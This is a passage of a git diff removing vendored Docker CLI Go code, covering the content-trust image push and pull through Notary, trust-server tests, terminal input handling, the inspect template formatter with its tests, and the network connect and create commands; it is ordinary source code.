"github.com/docker/distribution/digest" - "github.com/docker/docker/api/types" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/cli/trust" - "github.com/docker/docker/distribution" - "github.com/docker/docker/pkg/jsonmessage" - "github.com/docker/docker/reference" - "github.com/docker/docker/registry" - "github.com/docker/notary/client" - "github.com/docker/notary/tuf/data" -) - -type target struct { - name string - digest digest.Digest - size int64 -} - -// trustedPush handles content trust pushing of an image -func trustedPush(ctx context.Context, cli *command.DockerCli, repoInfo *registry.RepositoryInfo, ref reference.Named, authConfig types.AuthConfig, requestPrivilege types.RequestPrivilegeFunc) error { - responseBody, err := imagePushPrivileged(ctx, cli, authConfig, ref.String(), requestPrivilege) - if err != nil { - return err - } - - defer responseBody.Close() - - return PushTrustedReference(cli, repoInfo, ref, authConfig, responseBody) -} - -// PushTrustedReference pushes a canonical reference to the trust server. -func PushTrustedReference(cli *command.DockerCli, repoInfo *registry.RepositoryInfo, ref reference.Named, authConfig types.AuthConfig, in io.Reader) error { - // If it is a trusted push we would like to find the target entry which match the - // tag provided in the function and then do an AddTarget later. - target := &client.Target{} - // Count the times of calling for handleTarget, - // if it is called more that once, that should be considered an error in a trusted push. - cnt := 0 - handleTarget := func(aux *json.RawMessage) { - cnt++ - if cnt > 1 { - // handleTarget should only be called one. This will be treated as an error. 
- return - } - - var pushResult distribution.PushResult - err := json.Unmarshal(*aux, &pushResult) - if err == nil && pushResult.Tag != "" && pushResult.Digest.Validate() == nil { - h, err := hex.DecodeString(pushResult.Digest.Hex()) - if err != nil { - target = nil - return - } - target.Name = pushResult.Tag - target.Hashes = data.Hashes{string(pushResult.Digest.Algorithm()): h} - target.Length = int64(pushResult.Size) - } - } - - var tag string - switch x := ref.(type) { - case reference.Canonical: - return errors.New("cannot push a digest reference") - case reference.NamedTagged: - tag = x.Tag() - default: - // We want trust signatures to always take an explicit tag, - // otherwise it will act as an untrusted push. - if err := jsonmessage.DisplayJSONMessagesToStream(in, cli.Out(), nil); err != nil { - return err - } - fmt.Fprintln(cli.Out(), "No tag specified, skipping trust metadata push") - return nil - } - - if err := jsonmessage.DisplayJSONMessagesToStream(in, cli.Out(), handleTarget); err != nil { - return err - } - - if cnt > 1 { - return fmt.Errorf("internal error: only one call to handleTarget expected") - } - - if target == nil { - fmt.Fprintln(cli.Out(), "No targets found, please provide a specific tag in order to sign it") - return nil - } - - fmt.Fprintln(cli.Out(), "Signing and pushing trust metadata") - - repo, err := trust.GetNotaryRepository(cli, repoInfo, authConfig, "push", "pull") - if err != nil { - fmt.Fprintf(cli.Out(), "Error establishing connection to notary repository: %s\n", err) - return err - } - - // get the latest repository metadata so we can figure out which roles to sign - err = repo.Update(false) - - switch err.(type) { - case client.ErrRepoNotInitialized, client.ErrRepositoryNotExist: - keys := repo.CryptoService.ListKeys(data.CanonicalRootRole) - var rootKeyID string - // always select the first root key - if len(keys) > 0 { - sort.Strings(keys) - rootKeyID = keys[0] - } else { - rootPublicKey, err := 
repo.CryptoService.Create(data.CanonicalRootRole, "", data.ECDSAKey) - if err != nil { - return err - } - rootKeyID = rootPublicKey.ID() - } - - // Initialize the notary repository with a remotely managed snapshot key - if err := repo.Initialize([]string{rootKeyID}, data.CanonicalSnapshotRole); err != nil { - return trust.NotaryError(repoInfo.FullName(), err) - } - fmt.Fprintf(cli.Out(), "Finished initializing %q\n", repoInfo.FullName()) - err = repo.AddTarget(target, data.CanonicalTargetsRole) - case nil: - // already initialized and we have successfully downloaded the latest metadata - err = addTargetToAllSignableRoles(repo, target) - default: - return trust.NotaryError(repoInfo.FullName(), err) - } - - if err == nil { - err = repo.Publish() - } - - if err != nil { - fmt.Fprintf(cli.Out(), "Failed to sign %q:%s - %s\n", repoInfo.FullName(), tag, err.Error()) - return trust.NotaryError(repoInfo.FullName(), err) - } - - fmt.Fprintf(cli.Out(), "Successfully signed %q:%s\n", repoInfo.FullName(), tag) - return nil -} - -// Attempt to add the image target to all the top level delegation roles we can -// (based on whether we have the signing key and whether the role's path allows -// us to). -// If there are no delegation roles, we add to the targets role. 
-func addTargetToAllSignableRoles(repo *client.NotaryRepository, target *client.Target) error { - var signableRoles []string - - // translate the full key names, which includes the GUN, into just the key IDs - allCanonicalKeyIDs := make(map[string]struct{}) - for fullKeyID := range repo.CryptoService.ListAllKeys() { - allCanonicalKeyIDs[path.Base(fullKeyID)] = struct{}{} - } - - allDelegationRoles, err := repo.GetDelegationRoles() - if err != nil { - return err - } - - // if there are no delegation roles, then just try to sign it into the targets role - if len(allDelegationRoles) == 0 { - return repo.AddTarget(target, data.CanonicalTargetsRole) - } - - // there are delegation roles, find every delegation role we have a key for, and - // attempt to sign into into all those roles. - for _, delegationRole := range allDelegationRoles { - // We do not support signing any delegation role that isn't a direct child of the targets role. - // Also don't bother checking the keys if we can't add the target - // to this role due to path restrictions - if path.Dir(delegationRole.Name) != data.CanonicalTargetsRole || !delegationRole.CheckPaths(target.Name) { - continue - } - - for _, canonicalKeyID := range delegationRole.KeyIDs { - if _, ok := allCanonicalKeyIDs[canonicalKeyID]; ok { - signableRoles = append(signableRoles, delegationRole.Name) - break - } - } - } - - if len(signableRoles) == 0 { - return fmt.Errorf("no valid signing keys for delegation roles") - } - - return repo.AddTarget(target, signableRoles...) 
-} - -// imagePushPrivileged push the image -func imagePushPrivileged(ctx context.Context, cli *command.DockerCli, authConfig types.AuthConfig, ref string, requestPrivilege types.RequestPrivilegeFunc) (io.ReadCloser, error) { - encodedAuth, err := command.EncodeAuthToBase64(authConfig) - if err != nil { - return nil, err - } - options := types.ImagePushOptions{ - RegistryAuth: encodedAuth, - PrivilegeFunc: requestPrivilege, - } - - return cli.Client().ImagePush(ctx, ref, options) -} - -// trustedPull handles content trust pulling of an image -func trustedPull(ctx context.Context, cli *command.DockerCli, repoInfo *registry.RepositoryInfo, ref reference.Named, authConfig types.AuthConfig, requestPrivilege types.RequestPrivilegeFunc) error { - var refs []target - - notaryRepo, err := trust.GetNotaryRepository(cli, repoInfo, authConfig, "pull") - if err != nil { - fmt.Fprintf(cli.Out(), "Error establishing connection to trust repository: %s\n", err) - return err - } - - if tagged, isTagged := ref.(reference.NamedTagged); !isTagged { - // List all targets - targets, err := notaryRepo.ListTargets(trust.ReleasesRole, data.CanonicalTargetsRole) - if err != nil { - return trust.NotaryError(repoInfo.FullName(), err) - } - for _, tgt := range targets { - t, err := convertTarget(tgt.Target) - if err != nil { - fmt.Fprintf(cli.Out(), "Skipping target for %q\n", repoInfo.Name()) - continue - } - // Only list tags in the top level targets role or the releases delegation role - ignore - // all other delegation roles - if tgt.Role != trust.ReleasesRole && tgt.Role != data.CanonicalTargetsRole { - continue - } - refs = append(refs, t) - } - if len(refs) == 0 { - return trust.NotaryError(repoInfo.FullName(), fmt.Errorf("No trusted tags for %s", repoInfo.FullName())) - } - } else { - t, err := notaryRepo.GetTargetByName(tagged.Tag(), trust.ReleasesRole, data.CanonicalTargetsRole) - if err != nil { - return trust.NotaryError(repoInfo.FullName(), err) - } - // Only get the tag if it's 
in the top level targets role or the releases delegation role - // ignore it if it's in any other delegation roles - if t.Role != trust.ReleasesRole && t.Role != data.CanonicalTargetsRole { - return trust.NotaryError(repoInfo.FullName(), fmt.Errorf("No trust data for %s", tagged.Tag())) - } - - logrus.Debugf("retrieving target for %s role\n", t.Role) - r, err := convertTarget(t.Target) - if err != nil { - return err - - } - refs = append(refs, r) - } - - for i, r := range refs { - displayTag := r.name - if displayTag != "" { - displayTag = ":" + displayTag - } - fmt.Fprintf(cli.Out(), "Pull (%d of %d): %s%s@%s\n", i+1, len(refs), repoInfo.Name(), displayTag, r.digest) - - ref, err := reference.WithDigest(reference.TrimNamed(repoInfo), r.digest) - if err != nil { - return err - } - if err := imagePullPrivileged(ctx, cli, authConfig, ref.String(), requestPrivilege, false); err != nil { - return err - } - - tagged, err := reference.WithTag(repoInfo, r.name) - if err != nil { - return err - } - trustedRef, err := reference.WithDigest(reference.TrimNamed(repoInfo), r.digest) - if err != nil { - return err - } - if err := TagTrusted(ctx, cli, trustedRef, tagged); err != nil { - return err - } - } - return nil -} - -// imagePullPrivileged pulls the image and displays it to the output -func imagePullPrivileged(ctx context.Context, cli *command.DockerCli, authConfig types.AuthConfig, ref string, requestPrivilege types.RequestPrivilegeFunc, all bool) error { - - encodedAuth, err := command.EncodeAuthToBase64(authConfig) - if err != nil { - return err - } - options := types.ImagePullOptions{ - RegistryAuth: encodedAuth, - PrivilegeFunc: requestPrivilege, - All: all, - } - - responseBody, err := cli.Client().ImagePull(ctx, ref, options) - if err != nil { - return err - } - defer responseBody.Close() - - return jsonmessage.DisplayJSONMessagesToStream(responseBody, cli.Out(), nil) -} - -// TrustedReference returns the canonical trusted reference for an image reference -func 
TrustedReference(ctx context.Context, cli *command.DockerCli, ref reference.NamedTagged, rs registry.Service) (reference.Canonical, error) { - var ( - repoInfo *registry.RepositoryInfo - err error - ) - if rs != nil { - repoInfo, err = rs.ResolveRepository(ref) - } else { - repoInfo, err = registry.ParseRepositoryInfo(ref) - } - if err != nil { - return nil, err - } - - // Resolve the Auth config relevant for this server - authConfig := command.ResolveAuthConfig(ctx, cli, repoInfo.Index) - - notaryRepo, err := trust.GetNotaryRepository(cli, repoInfo, authConfig, "pull") - if err != nil { - fmt.Fprintf(cli.Out(), "Error establishing connection to trust repository: %s\n", err) - return nil, err - } - - t, err := notaryRepo.GetTargetByName(ref.Tag(), trust.ReleasesRole, data.CanonicalTargetsRole) - if err != nil { - return nil, trust.NotaryError(repoInfo.FullName(), err) - } - // Only list tags in the top level targets role or the releases delegation role - ignore - // all other delegation roles - if t.Role != trust.ReleasesRole && t.Role != data.CanonicalTargetsRole { - return nil, trust.NotaryError(repoInfo.FullName(), fmt.Errorf("No trust data for %s", ref.Tag())) - } - r, err := convertTarget(t.Target) - if err != nil { - return nil, err - - } - - return reference.WithDigest(reference.TrimNamed(ref), r.digest) -} - -func convertTarget(t client.Target) (target, error) { - h, ok := t.Hashes["sha256"] - if !ok { - return target{}, errors.New("no valid hash, expecting sha256") - } - return target{ - name: t.Name, - digest: digest.NewDigestFromHex("sha256", hex.EncodeToString(h)), - size: t.Length, - }, nil -} - -// TagTrusted tags a trusted ref -func TagTrusted(ctx context.Context, cli *command.DockerCli, trustedRef reference.Canonical, ref reference.NamedTagged) error { - fmt.Fprintf(cli.Out(), "Tagging %s as %s\n", trustedRef.String(), ref.String()) - - return cli.Client().ImageTag(ctx, trustedRef.String(), ref.String()) -} diff --git 
a/vendor/github.com/docker/docker/cli/command/image/trust_test.go b/vendor/github.com/docker/docker/cli/command/image/trust_test.go deleted file mode 100644 index 78146465e6..0000000000 --- a/vendor/github.com/docker/docker/cli/command/image/trust_test.go +++ /dev/null @@ -1,57 +0,0 @@ -package image - -import ( - "os" - "testing" - - registrytypes "github.com/docker/docker/api/types/registry" - "github.com/docker/docker/cli/trust" - "github.com/docker/docker/registry" -) - -func unsetENV() { - os.Unsetenv("DOCKER_CONTENT_TRUST") - os.Unsetenv("DOCKER_CONTENT_TRUST_SERVER") -} - -func TestENVTrustServer(t *testing.T) { - defer unsetENV() - indexInfo := ®istrytypes.IndexInfo{Name: "testserver"} - if err := os.Setenv("DOCKER_CONTENT_TRUST_SERVER", "https://notary-test.com:5000"); err != nil { - t.Fatal("Failed to set ENV variable") - } - output, err := trust.Server(indexInfo) - expectedStr := "https://notary-test.com:5000" - if err != nil || output != expectedStr { - t.Fatalf("Expected server to be %s, got %s", expectedStr, output) - } -} - -func TestHTTPENVTrustServer(t *testing.T) { - defer unsetENV() - indexInfo := ®istrytypes.IndexInfo{Name: "testserver"} - if err := os.Setenv("DOCKER_CONTENT_TRUST_SERVER", "http://notary-test.com:5000"); err != nil { - t.Fatal("Failed to set ENV variable") - } - _, err := trust.Server(indexInfo) - if err == nil { - t.Fatal("Expected error with invalid scheme") - } -} - -func TestOfficialTrustServer(t *testing.T) { - indexInfo := ®istrytypes.IndexInfo{Name: "testserver", Official: true} - output, err := trust.Server(indexInfo) - if err != nil || output != registry.NotaryServer { - t.Fatalf("Expected server to be %s, got %s", registry.NotaryServer, output) - } -} - -func TestNonOfficialTrustServer(t *testing.T) { - indexInfo := ®istrytypes.IndexInfo{Name: "testserver", Official: false} - output, err := trust.Server(indexInfo) - expectedStr := "https://" + indexInfo.Name - if err != nil || output != expectedStr { - 
t.Fatalf("Expected server to be %s, got %s", expectedStr, output) - } -} diff --git a/vendor/github.com/docker/docker/cli/command/in.go b/vendor/github.com/docker/docker/cli/command/in.go deleted file mode 100644 index 7204b7ad04..0000000000 --- a/vendor/github.com/docker/docker/cli/command/in.go +++ /dev/null @@ -1,75 +0,0 @@ -package command - -import ( - "errors" - "io" - "os" - "runtime" - - "github.com/docker/docker/pkg/term" -) - -// InStream is an input stream used by the DockerCli to read user input -type InStream struct { - in io.ReadCloser - fd uintptr - isTerminal bool - state *term.State -} - -func (i *InStream) Read(p []byte) (int, error) { - return i.in.Read(p) -} - -// Close implements the Closer interface -func (i *InStream) Close() error { - return i.in.Close() -} - -// FD returns the file descriptor number for this stream -func (i *InStream) FD() uintptr { - return i.fd -} - -// IsTerminal returns true if this stream is connected to a terminal -func (i *InStream) IsTerminal() bool { - return i.isTerminal -} - -// SetRawTerminal sets raw mode on the input terminal -func (i *InStream) SetRawTerminal() (err error) { - if os.Getenv("NORAW") != "" || !i.isTerminal { - return nil - } - i.state, err = term.SetRawTerminal(i.fd) - return err -} - -// RestoreTerminal restores normal mode to the terminal -func (i *InStream) RestoreTerminal() { - if i.state != nil { - term.RestoreTerminal(i.fd, i.state) - } -} - -// CheckTty checks if we are trying to attach to a container tty -// from a non-tty client input stream, and if so, returns an error. -func (i *InStream) CheckTty(attachStdin, ttyMode bool) error { - // In order to attach to a container tty, input stream for the client must - // be a tty itself: redirecting or piping the client standard input is - // incompatible with `docker run -t`, `docker exec -t` or `docker attach`. 
- if ttyMode && attachStdin && !i.isTerminal { - eText := "the input device is not a TTY" - if runtime.GOOS == "windows" { - return errors.New(eText + ". If you are using mintty, try prefixing the command with 'winpty'") - } - return errors.New(eText) - } - return nil -} - -// NewInStream returns a new InStream object from a ReadCloser -func NewInStream(in io.ReadCloser) *InStream { - fd, isTerminal := term.GetFdInfo(in) - return &InStream{in: in, fd: fd, isTerminal: isTerminal} -} diff --git a/vendor/github.com/docker/docker/cli/command/inspect/inspector.go b/vendor/github.com/docker/docker/cli/command/inspect/inspector.go deleted file mode 100644 index 1d81643fb1..0000000000 --- a/vendor/github.com/docker/docker/cli/command/inspect/inspector.go +++ /dev/null @@ -1,195 +0,0 @@ -package inspect - -import ( - "bytes" - "encoding/json" - "fmt" - "io" - "text/template" - - "github.com/Sirupsen/logrus" - "github.com/docker/docker/cli" - "github.com/docker/docker/utils/templates" -) - -// Inspector defines an interface to implement to process elements -type Inspector interface { - Inspect(typedElement interface{}, rawElement []byte) error - Flush() error -} - -// TemplateInspector uses a text template to inspect elements. -type TemplateInspector struct { - outputStream io.Writer - buffer *bytes.Buffer - tmpl *template.Template -} - -// NewTemplateInspector creates a new inspector with a template. -func NewTemplateInspector(outputStream io.Writer, tmpl *template.Template) Inspector { - return &TemplateInspector{ - outputStream: outputStream, - buffer: new(bytes.Buffer), - tmpl: tmpl, - } -} - -// NewTemplateInspectorFromString creates a new TemplateInspector from a string -// which is compiled into a template. 
-func NewTemplateInspectorFromString(out io.Writer, tmplStr string) (Inspector, error) { - if tmplStr == "" { - return NewIndentedInspector(out), nil - } - - tmpl, err := templates.Parse(tmplStr) - if err != nil { - return nil, fmt.Errorf("Template parsing error: %s", err) - } - return NewTemplateInspector(out, tmpl), nil -} - -// GetRefFunc is a function which used by Inspect to fetch an object from a -// reference -type GetRefFunc func(ref string) (interface{}, []byte, error) - -// Inspect fetches objects by reference using GetRefFunc and writes the json -// representation to the output writer. -func Inspect(out io.Writer, references []string, tmplStr string, getRef GetRefFunc) error { - inspector, err := NewTemplateInspectorFromString(out, tmplStr) - if err != nil { - return cli.StatusError{StatusCode: 64, Status: err.Error()} - } - - var inspectErr error - for _, ref := range references { - element, raw, err := getRef(ref) - if err != nil { - inspectErr = err - break - } - - if err := inspector.Inspect(element, raw); err != nil { - inspectErr = err - break - } - } - - if err := inspector.Flush(); err != nil { - logrus.Errorf("%s\n", err) - } - - if inspectErr != nil { - return cli.StatusError{StatusCode: 1, Status: inspectErr.Error()} - } - return nil -} - -// Inspect executes the inspect template. -// It decodes the raw element into a map if the initial execution fails. -// This allows docker cli to parse inspect structs injected with Swarm fields. -func (i *TemplateInspector) Inspect(typedElement interface{}, rawElement []byte) error { - buffer := new(bytes.Buffer) - if err := i.tmpl.Execute(buffer, typedElement); err != nil { - if rawElement == nil { - return fmt.Errorf("Template parsing error: %v", err) - } - return i.tryRawInspectFallback(rawElement) - } - i.buffer.Write(buffer.Bytes()) - i.buffer.WriteByte('\n') - return nil -} - -// tryRawInspectFallback executes the inspect template with a raw interface. 
-// This allows docker cli to parse inspect structs injected with Swarm fields. -func (i *TemplateInspector) tryRawInspectFallback(rawElement []byte) error { - var raw interface{} - buffer := new(bytes.Buffer) - rdr := bytes.NewReader(rawElement) - dec := json.NewDecoder(rdr) - - if rawErr := dec.Decode(&raw); rawErr != nil { - return fmt.Errorf("unable to read inspect data: %v", rawErr) - } - - tmplMissingKey := i.tmpl.Option("missingkey=error") - if rawErr := tmplMissingKey.Execute(buffer, raw); rawErr != nil { - return fmt.Errorf("Template parsing error: %v", rawErr) - } - - i.buffer.Write(buffer.Bytes()) - i.buffer.WriteByte('\n') - return nil -} - -// Flush writes the result of inspecting all elements into the output stream. -func (i *TemplateInspector) Flush() error { - if i.buffer.Len() == 0 { - _, err := io.WriteString(i.outputStream, "\n") - return err - } - _, err := io.Copy(i.outputStream, i.buffer) - return err -} - -// IndentedInspector uses a buffer to stop the indented representation of an element. -type IndentedInspector struct { - outputStream io.Writer - elements []interface{} - rawElements [][]byte -} - -// NewIndentedInspector generates a new IndentedInspector. -func NewIndentedInspector(outputStream io.Writer) Inspector { - return &IndentedInspector{ - outputStream: outputStream, - } -} - -// Inspect writes the raw element with an indented json format. -func (i *IndentedInspector) Inspect(typedElement interface{}, rawElement []byte) error { - if rawElement != nil { - i.rawElements = append(i.rawElements, rawElement) - } else { - i.elements = append(i.elements, typedElement) - } - return nil -} - -// Flush writes the result of inspecting all elements into the output stream. 
-func (i *IndentedInspector) Flush() error { - if len(i.elements) == 0 && len(i.rawElements) == 0 { - _, err := io.WriteString(i.outputStream, "[]\n") - return err - } - - var buffer io.Reader - if len(i.rawElements) > 0 { - bytesBuffer := new(bytes.Buffer) - bytesBuffer.WriteString("[") - for idx, r := range i.rawElements { - bytesBuffer.Write(r) - if idx < len(i.rawElements)-1 { - bytesBuffer.WriteString(",") - } - } - bytesBuffer.WriteString("]") - indented := new(bytes.Buffer) - if err := json.Indent(indented, bytesBuffer.Bytes(), "", " "); err != nil { - return err - } - buffer = indented - } else { - b, err := json.MarshalIndent(i.elements, "", " ") - if err != nil { - return err - } - buffer = bytes.NewReader(b) - } - - if _, err := io.Copy(i.outputStream, buffer); err != nil { - return err - } - _, err := io.WriteString(i.outputStream, "\n") - return err -} diff --git a/vendor/github.com/docker/docker/cli/command/inspect/inspector_test.go b/vendor/github.com/docker/docker/cli/command/inspect/inspector_test.go deleted file mode 100644 index 1ce1593ab7..0000000000 --- a/vendor/github.com/docker/docker/cli/command/inspect/inspector_test.go +++ /dev/null @@ -1,221 +0,0 @@ -package inspect - -import ( - "bytes" - "strings" - "testing" - - "github.com/docker/docker/utils/templates" -) - -type testElement struct { - DNS string `json:"Dns"` -} - -func TestTemplateInspectorDefault(t *testing.T) { - b := new(bytes.Buffer) - tmpl, err := templates.Parse("{{.DNS}}") - if err != nil { - t.Fatal(err) - } - i := NewTemplateInspector(b, tmpl) - if err := i.Inspect(testElement{"0.0.0.0"}, nil); err != nil { - t.Fatal(err) - } - - if err := i.Flush(); err != nil { - t.Fatal(err) - } - if b.String() != "0.0.0.0\n" { - t.Fatalf("Expected `0.0.0.0\\n`, got `%s`", b.String()) - } -} - -func TestTemplateInspectorEmpty(t *testing.T) { - b := new(bytes.Buffer) - tmpl, err := templates.Parse("{{.DNS}}") - if err != nil { - t.Fatal(err) - } - i := NewTemplateInspector(b, tmpl) - - if 
err := i.Flush(); err != nil { - t.Fatal(err) - } - if b.String() != "\n" { - t.Fatalf("Expected `\\n`, got `%s`", b.String()) - } -} - -func TestTemplateInspectorTemplateError(t *testing.T) { - b := new(bytes.Buffer) - tmpl, err := templates.Parse("{{.Foo}}") - if err != nil { - t.Fatal(err) - } - i := NewTemplateInspector(b, tmpl) - - err = i.Inspect(testElement{"0.0.0.0"}, nil) - if err == nil { - t.Fatal("Expected error got nil") - } - - if !strings.HasPrefix(err.Error(), "Template parsing error") { - t.Fatalf("Expected template error, got %v", err) - } -} - -func TestTemplateInspectorRawFallback(t *testing.T) { - b := new(bytes.Buffer) - tmpl, err := templates.Parse("{{.Dns}}") - if err != nil { - t.Fatal(err) - } - i := NewTemplateInspector(b, tmpl) - if err := i.Inspect(testElement{"0.0.0.0"}, []byte(`{"Dns": "0.0.0.0"}`)); err != nil { - t.Fatal(err) - } - - if err := i.Flush(); err != nil { - t.Fatal(err) - } - if b.String() != "0.0.0.0\n" { - t.Fatalf("Expected `0.0.0.0\\n`, got `%s`", b.String()) - } -} - -func TestTemplateInspectorRawFallbackError(t *testing.T) { - b := new(bytes.Buffer) - tmpl, err := templates.Parse("{{.Dns}}") - if err != nil { - t.Fatal(err) - } - i := NewTemplateInspector(b, tmpl) - err = i.Inspect(testElement{"0.0.0.0"}, []byte(`{"Foo": "0.0.0.0"}`)) - if err == nil { - t.Fatal("Expected error got nil") - } - - if !strings.HasPrefix(err.Error(), "Template parsing error") { - t.Fatalf("Expected template error, got %v", err) - } -} - -func TestTemplateInspectorMultiple(t *testing.T) { - b := new(bytes.Buffer) - tmpl, err := templates.Parse("{{.DNS}}") - if err != nil { - t.Fatal(err) - } - i := NewTemplateInspector(b, tmpl) - - if err := i.Inspect(testElement{"0.0.0.0"}, nil); err != nil { - t.Fatal(err) - } - if err := i.Inspect(testElement{"1.1.1.1"}, nil); err != nil { - t.Fatal(err) - } - - if err := i.Flush(); err != nil { - t.Fatal(err) - } - if b.String() != "0.0.0.0\n1.1.1.1\n" { - t.Fatalf("Expected `0.0.0.0\\n1.1.1.1\\n`, 
got `%s`", b.String()) - } -} - -func TestIndentedInspectorDefault(t *testing.T) { - b := new(bytes.Buffer) - i := NewIndentedInspector(b) - if err := i.Inspect(testElement{"0.0.0.0"}, nil); err != nil { - t.Fatal(err) - } - - if err := i.Flush(); err != nil { - t.Fatal(err) - } - - expected := `[ - { - "Dns": "0.0.0.0" - } -] -` - if b.String() != expected { - t.Fatalf("Expected `%s`, got `%s`", expected, b.String()) - } -} - -func TestIndentedInspectorMultiple(t *testing.T) { - b := new(bytes.Buffer) - i := NewIndentedInspector(b) - if err := i.Inspect(testElement{"0.0.0.0"}, nil); err != nil { - t.Fatal(err) - } - - if err := i.Inspect(testElement{"1.1.1.1"}, nil); err != nil { - t.Fatal(err) - } - - if err := i.Flush(); err != nil { - t.Fatal(err) - } - - expected := `[ - { - "Dns": "0.0.0.0" - }, - { - "Dns": "1.1.1.1" - } -] -` - if b.String() != expected { - t.Fatalf("Expected `%s`, got `%s`", expected, b.String()) - } -} - -func TestIndentedInspectorEmpty(t *testing.T) { - b := new(bytes.Buffer) - i := NewIndentedInspector(b) - - if err := i.Flush(); err != nil { - t.Fatal(err) - } - - expected := "[]\n" - if b.String() != expected { - t.Fatalf("Expected `%s`, got `%s`", expected, b.String()) - } -} - -func TestIndentedInspectorRawElements(t *testing.T) { - b := new(bytes.Buffer) - i := NewIndentedInspector(b) - if err := i.Inspect(testElement{"0.0.0.0"}, []byte(`{"Dns": "0.0.0.0", "Node": "0"}`)); err != nil { - t.Fatal(err) - } - - if err := i.Inspect(testElement{"1.1.1.1"}, []byte(`{"Dns": "1.1.1.1", "Node": "1"}`)); err != nil { - t.Fatal(err) - } - - if err := i.Flush(); err != nil { - t.Fatal(err) - } - - expected := `[ - { - "Dns": "0.0.0.0", - "Node": "0" - }, - { - "Dns": "1.1.1.1", - "Node": "1" - } -] -` - if b.String() != expected { - t.Fatalf("Expected `%s`, got `%s`", expected, b.String()) - } -} diff --git a/vendor/github.com/docker/docker/cli/command/network/cmd.go b/vendor/github.com/docker/docker/cli/command/network/cmd.go deleted file 
mode 100644 index ab8393cded..0000000000 --- a/vendor/github.com/docker/docker/cli/command/network/cmd.go +++ /dev/null @@ -1,28 +0,0 @@ -package network - -import ( - "github.com/spf13/cobra" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" -) - -// NewNetworkCommand returns a cobra command for `network` subcommands -func NewNetworkCommand(dockerCli *command.DockerCli) *cobra.Command { - cmd := &cobra.Command{ - Use: "network", - Short: "Manage networks", - Args: cli.NoArgs, - RunE: dockerCli.ShowHelp, - } - cmd.AddCommand( - newConnectCommand(dockerCli), - newCreateCommand(dockerCli), - newDisconnectCommand(dockerCli), - newInspectCommand(dockerCli), - newListCommand(dockerCli), - newRemoveCommand(dockerCli), - NewPruneCommand(dockerCli), - ) - return cmd -} diff --git a/vendor/github.com/docker/docker/cli/command/network/connect.go b/vendor/github.com/docker/docker/cli/command/network/connect.go deleted file mode 100644 index c4b676e5f1..0000000000 --- a/vendor/github.com/docker/docker/cli/command/network/connect.go +++ /dev/null @@ -1,64 +0,0 @@ -package network - -import ( - "golang.org/x/net/context" - - "github.com/docker/docker/api/types/network" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/opts" - runconfigopts "github.com/docker/docker/runconfig/opts" - "github.com/spf13/cobra" -) - -type connectOptions struct { - network string - container string - ipaddress string - ipv6address string - links opts.ListOpts - aliases []string - linklocalips []string -} - -func newConnectCommand(dockerCli *command.DockerCli) *cobra.Command { - opts := connectOptions{ - links: opts.NewListOpts(runconfigopts.ValidateLink), - } - - cmd := &cobra.Command{ - Use: "connect [OPTIONS] NETWORK CONTAINER", - Short: "Connect a container to a network", - Args: cli.ExactArgs(2), - RunE: func(cmd *cobra.Command, args []string) error { - opts.network = args[0] - opts.container = args[1] - return 
runConnect(dockerCli, opts) - }, - } - - flags := cmd.Flags() - flags.StringVar(&opts.ipaddress, "ip", "", "IP Address") - flags.StringVar(&opts.ipv6address, "ip6", "", "IPv6 Address") - flags.Var(&opts.links, "link", "Add link to another container") - flags.StringSliceVar(&opts.aliases, "alias", []string{}, "Add network-scoped alias for the container") - flags.StringSliceVar(&opts.linklocalips, "link-local-ip", []string{}, "Add a link-local address for the container") - - return cmd -} - -func runConnect(dockerCli *command.DockerCli, opts connectOptions) error { - client := dockerCli.Client() - - epConfig := &network.EndpointSettings{ - IPAMConfig: &network.EndpointIPAMConfig{ - IPv4Address: opts.ipaddress, - IPv6Address: opts.ipv6address, - LinkLocalIPs: opts.linklocalips, - }, - Links: opts.links.GetAll(), - Aliases: opts.aliases, - } - - return client.NetworkConnect(context.Background(), opts.network, opts.container, epConfig) -} diff --git a/vendor/github.com/docker/docker/cli/command/network/create.go b/vendor/github.com/docker/docker/cli/command/network/create.go deleted file mode 100644 index abc494e1e0..0000000000 --- a/vendor/github.com/docker/docker/cli/command/network/create.go +++ /dev/null @@ -1,226 +0,0 @@ -package network - -import ( - "fmt" - "net" - "strings" - - "golang.org/x/net/context" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/api/types/network" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/opts" - runconfigopts "github.com/docker/docker/runconfig/opts" - "github.com/spf13/cobra" -) - -type createOptions struct { - name string - driver string - driverOpts opts.MapOpts - labels opts.ListOpts - internal bool - ipv6 bool - attachable bool - - ipamDriver string - ipamSubnet []string - ipamIPRange []string - ipamGateway []string - ipamAux opts.MapOpts - ipamOpt opts.MapOpts -} - -func newCreateCommand(dockerCli *command.DockerCli) *cobra.Command { - opts := 
createOptions{ - driverOpts: *opts.NewMapOpts(nil, nil), - labels: opts.NewListOpts(runconfigopts.ValidateEnv), - ipamAux: *opts.NewMapOpts(nil, nil), - ipamOpt: *opts.NewMapOpts(nil, nil), - } - - cmd := &cobra.Command{ - Use: "create [OPTIONS] NETWORK", - Short: "Create a network", - Args: cli.ExactArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.name = args[0] - return runCreate(dockerCli, opts) - }, - } - - flags := cmd.Flags() - flags.StringVarP(&opts.driver, "driver", "d", "bridge", "Driver to manage the Network") - flags.VarP(&opts.driverOpts, "opt", "o", "Set driver specific options") - flags.Var(&opts.labels, "label", "Set metadata on a network") - flags.BoolVar(&opts.internal, "internal", false, "Restrict external access to the network") - flags.BoolVar(&opts.ipv6, "ipv6", false, "Enable IPv6 networking") - flags.BoolVar(&opts.attachable, "attachable", false, "Enable manual container attachment") - - flags.StringVar(&opts.ipamDriver, "ipam-driver", "default", "IP Address Management Driver") - flags.StringSliceVar(&opts.ipamSubnet, "subnet", []string{}, "Subnet in CIDR format that represents a network segment") - flags.StringSliceVar(&opts.ipamIPRange, "ip-range", []string{}, "Allocate container ip from a sub-range") - flags.StringSliceVar(&opts.ipamGateway, "gateway", []string{}, "IPv4 or IPv6 Gateway for the master subnet") - - flags.Var(&opts.ipamAux, "aux-address", "Auxiliary IPv4 or IPv6 addresses used by Network driver") - flags.Var(&opts.ipamOpt, "ipam-opt", "Set IPAM driver specific options") - - return cmd -} - -func runCreate(dockerCli *command.DockerCli, opts createOptions) error { - client := dockerCli.Client() - - ipamCfg, err := consolidateIpam(opts.ipamSubnet, opts.ipamIPRange, opts.ipamGateway, 